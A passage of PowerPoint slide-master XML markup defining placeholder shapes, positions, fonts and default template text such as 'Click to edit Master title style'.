            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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121" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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122" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="10058040" cy="54468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1097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="100580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125" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="10058040" cy="54468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1097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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128" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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129" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="505008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130" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="323856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133" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498200" y="4453200"/>
            <a:ext cx="323856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134" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899120" y="4453200"/>
            <a:ext cx="323856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135" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="323856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136" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498200" y="5050080"/>
            <a:ext cx="323856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137" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899120" y="5050080"/>
            <a:ext cx="3238560" cy="54468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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="4453200"/>
            <a:ext cx="4908240" cy="114264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1097280" y="758880"/>
            <a:ext cx="10058040" cy="356580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1097280" y="2165760"/>
            <a:ext cx="10058040" cy="137160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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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22" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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27" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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30" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="4453200"/>
            <a:ext cx="4908240" cy="544680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="10058040" cy="544680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40404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 name="CustomShape 2" hidden="1"/>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1193400" y="1737720"/>
            <a:ext cx="996696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3" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240" y="6400800"/>
            <a:ext cx="121885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0" y="6334200"/>
            <a:ext cx="121885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 name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="8000" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="6459840"/>
            <a:ext cx="2471760" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{1F90605D-3DD8-411C-91B0-8E91E43EA997}" type="datetime">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>7/17/20</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686040" y="6459840"/>
            <a:ext cx="4822560" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9900360" y="6459840"/>
            <a:ext cx="1311840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{738DBC38-60AD-47F1-8ED3-744A16C4E778}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1050" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1050" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Line 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207440" y="4343400"/>
            <a:ext cx="987552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10" name="PlaceHolder 11"/>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solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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Calibri"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1296000" indent="-288000">
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1728000" indent="-216000">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40404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Calibri"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40404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Calibri"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40404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Calibri"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="40404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CustomShape 1"/>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8" name="CustomShape 2"/>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9" name="Line 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193400" y="1737720"/>
            <a:ext cx="996696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50" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>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Edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="◦"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="567000" indent="-18252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Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="749880" indent="-18252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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="932760" indent="-18252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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="6459840"/>
            <a:ext cx="2471760" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{9A93B059-2A92-4C6D-9A5F-8D6199A3BAB7}" type="datetime">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>7/17/20</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686040" y="6459840"/>
            <a:ext cx="4822560" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="PlaceHolder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9900360" y="6459840"/>
            <a:ext cx="1311840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
